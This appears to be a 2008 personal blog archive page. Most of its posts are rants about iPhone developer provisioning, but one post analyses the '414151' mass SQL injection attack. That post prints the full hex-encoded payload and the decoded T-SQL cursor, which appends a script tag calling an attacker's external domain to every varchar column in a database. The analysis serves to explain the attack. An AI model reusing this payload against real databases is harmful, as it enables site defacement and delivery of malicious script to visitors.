Archive for April, 2008

Returned meself an iPhone!

April 23rd, 2008

Yup, had enough.  So three major reasons:

 

  1. Can’t get my iPhone provisioned so that I can put the applications I write on to it because the iPhone Developer program is closed at the moment.  (See my other posts on the subject)
  2. New 3G iPhone is strongly rumored to be coming out in the summer
  3. Email is just painful.  Yahoo push mail is a joke.  I blame both Apple and Yahoo for this, but mostly I believe it’s because of EDGE.  My hope is that the 3G iPhone will have a chance of having productive like email capabilities.

My conclusion was to return the iPhone (can do this within 30 days), get the free Nokia and then come this summer upgrade to a new iPhone 2.0 with 3G.  The rumors are also that the developer program will open up after the SDK is officially released.
 

My appreciation to the ATT store at 78th and Broadway for being so nice and understanding. 

 

Posted by Barry | Filed in soul | Comment now »

 

Apple: iPhone Developer Program on Hold. Barry: You Mother @#*)%$’s

April 22nd, 2008

Sorry, but I am still steamed over the whole Developer program.  Needed just one more rant about it…

Well, talk about taking the wind of out your sails. 

Watch the momentum grow:

  1. I jumped in head first, bought an iPhone - hearts beating, new toy, I can touch it and it vibrates…
  2. Downloaded the SDK - WOW, Apple seems to have their shit together, gonna write my first Apple based program since college…
  3. Installed the tools - can’t believe Apple made good tools finally, the simulator looks rockin…
  4. Watched the videos - these are great, why are they all wearing the same tshirt, hope they make more of these…
  5. Read the documentation - ok, not so great, but more than I expected, they seem to be locking down the beta pretty good, why aren’t there more articles…
  6. Wrote my first program - heart is really racing now, I think I can do this, imagine the possibilities…
  7. Ran my app on the simulator - This thing really does rock, I hope it works this great on my phone, can’t wait to make my first commercial app, I am going to be a star at work, chicks will dig me…
  8. Switch the target from simulator to device - What does it mean "provision"?

 

So until they open back up the Developer program which is another friggin $100 I am more than willing to pay, I cant "provision" my friggin iPhone.

 

OY.  Maybe the chicks will dig the simulator?  Hold on while I compile….

 

More info: 

http://www.macrumors.com/2008/03/14/apple-slowly-ramping-up-iphone-developer-program/

http://www.tuaw.com/2008/03/14/iphone-developer-rejection-letter-mass-mailing/

http://twitter.com/danielpunkass/statuses/771541151

http://twitter.com/davidweiss/statuses/771549002

http://www.iphoneatlas.com/2008/03/14/apple-rejecting-iphone-sdk-applicants-en-masse/

 

 

Posted by Barry | Filed in soul, via | Comment now »

 

Got meself an iPhone

April 18th, 2008

So I got a hankering to make me some iPhone apps…Ok, I will stop talking like that.  Apple SDKBut it really was like that - last weekend I decided I wanted to make some simple iPhone apps, so I downloaded the SDK, signed up for the developer program and then earlier this week I bought mYself an iPhone. 

 

According to Mossberg that was probably a mistake and probably a bigger one than I realized.  He thinks the 3G version is coming out in June.  My bad was that I didnt realize it but in order to actually install the programs you write with the sdk on to your device it needs to be "provisioned".  Maybe this is an Apple thing, but this is my first venture into Apple coding so I was surprised by this.  Anyway, I cant get provisioned until I am accepted into the developer program and pay my $99.  And at the moment they are not accepting applications:

 

Thank you for applying to the iPhone Developer Program. We have many more requests than we can serve during this initial beta period, so we must limit the Program at this time. We plan to expand it during the beta period, and we will contact you regarding your enrollment status at the appropriate time. We appreciate your patience.

I hope to keep writing about my experience, but for now.  See ya.
 

 

 

Posted by Barry | Filed in soul | Comment now »

 

SQL Injection is cool

April 18th, 2008

Overview

So seeing sites hacked is pretty cool unless it’s one of yours.  I kinda look at hacking as the end-all-be-all of elite programming.  Of course, the intent isn’t always good, but the techniques are artful.  I most recently witnessed an impressive SQL Injection hack on a website.  I refer to it as the "414151 Hack", but others are calling a similar hack the "IFRAME SEO Poisoning Attack" which appears to be the same code just implemented a little differently.  Of course anyone who has been hacked by this code will recognize these numbers.  As far as SQL Injection attacks go this one seems to have taken a similar systematic approach.  I am not going to go into the explanation of how SQL Injection works or the techniques hackers use - there are plenty of sources on the internet for that.  I will list some references at the end.

The Details

There were a couple things that impressed me about this particular hack.

  1. The outcome was that the hack code inserted a <script> tag with a reference url into every varchar column in the database.  The site was running .Net, IIS with SQL Server 2000.  I mention the technology because the script assumes SQL Server.  That said, don’t fool yourself to think that this is some hole within .Net, IIS or SQL Server - these attacks are due to lazy programmers who implement bad practices.  Specifically inline or free SQL statements within code and could occur on any (most) platform, language or database.  The resulting effect to the user was a slow experience due to the fact the script reference didn’t resolve.  It was a good thing in that there was no telling what other damage might have been inflicted if the script was active.
  2. The second thing that impressed me was the actual code that executed this varchar manipulation.  It was elegantly disguised (not sure if that was the intent) within a long hexadecimal string that when interpreted was an equally elegant SQL statement.
The Possibilities

The possibilities of this hack scare me (and impress me).  When I started searching around the web for this 414151 script I found a good number of references.  Unfortunately, I didn’t find too many people talking about the hack but instead I found hundreds of sites that were actually hacked also.  I list one link below of an article that talks about it quite a lot.  According to this article many large websites such as USA Today, ABC News, Target, Walmart, etc… have all been infected with a similar hack.

It is quite frightening when you think of such an effective and widespread hack that basically is designed to "phone home" and execute some unknown Javascript anytime the author decides to turn on his website (synchronized attack scenario) ….well…I think it would have made the news.

The Javascript
<script src=http://www.414151.com/fjp.js></script>
The Hexadecimal
4400450043004C00410052004500200040005400200076006100720
06300680061007200280032003500350029002C00400043002000760061007
20063006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F0043007500720073006F
007200200043005500520053004F005200200046004F005200200073006
5006C00650063007400200061002E006E0061006D0065002C0062002E
006E0061006D0065002000660072006F006D0020007300790073006F006
2006A006500630074007300200061002C0073007900730063006F006C
0075006D006E00730020006200200077006800650072006500200061002
E00690064003D0062002E0069006400200061006E006400200061002E
00780074007900700065003D00270075002700200061006E00640020002
80062002E00780074007900700065003D003900390020006F007200200
062002E00780074007900700065003D003300350020006F007200200062
002E00780074007900700065003D0032003300310020006F0072002000
62002E00780074007900700065003D00310036003700290020004F00500
045004E0020005400610062006C0065005F0043007500720073006F007
20020004600450054004300480020004E004500580054002000460052004
F004D00200020005400610062006C0065005F0043007500720073006F
007200200049004E0054004F002000400054002C0040004300200057004
80049004C004500280040004000460045005400430048005F005300540
041005400550053003D0030002900200042004500470049004E00200065
007800650063002800270075007000640061007400650020005B002700
2B00400054002B0027005D00200073006500740020005B0027002B0040
0043002B0027005D003D0072007400720069006D00280063006F006E0
07600650072007400280076006100720063006800610072002C005B0027
002B00400043002B0027005D00290029002B00270027003C007300630
0720069007000740020007300720063003D0068007400740070003A002F
002F007700770077002E003400310034003100350031002E0063006F00
6D002F0066006A0070002E006A0073003E003C002F0073006300720069
00700074003E0027002700270029004600450054004300480020004E00
4500580054002000460052004F004D00200020005400610062006C00650
05F0043007500720073006F007200200049004E0054004F00200040005
4002C0040004300200045004E004400200043004C004F00530045002000
5400610062006C0065005F0043007500720073006F0072002000440045
0041004C004C004F00430041005400450020005400610062006C0065005
F0043007500720073006F007200
The SQL Statement

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor 

CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b 

where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or 

b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM 

 Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN 

exec(’update [’+@T+’] set [’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+

”<script src=http://www.414151.com/fjp.js></script>”’)FETCH NEXT 

FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor
Other references

Update (4/29)…

This one keeps going and going.

I also wanted to add that another very impressive part of this hack is how the hacker finds a vulnerable page and then iterates through many different scenarios until one clicks.  I didn’t mention this earlier because this is inherent in all SQL Injection attacks.

 

Posted by Barry | Filed in soul | Comment now »

 

Good quote from CIO mag

April 17th, 2008

Any IT organization that’s willing to do without training, innovation, process improvements, client relationship building and other "keep-the-business-viable" activities is only postponing its inevitable demise.

 

Posted by Barry | Filed in soul | Comment now »

 

Design by MIF Design Studio and tweaked by BigB |
Brought by Consolidate Debt |